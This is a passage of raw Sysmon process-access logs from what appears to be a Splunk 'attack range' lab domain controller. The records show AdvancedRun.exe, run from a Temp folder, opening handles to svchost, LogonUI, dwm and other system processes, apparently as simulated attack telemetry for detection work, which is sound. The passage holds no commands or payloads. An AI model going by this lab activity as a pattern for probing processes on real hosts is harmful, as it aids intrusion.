sers\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004008573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004008571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008570Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004008569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004008568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004008567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
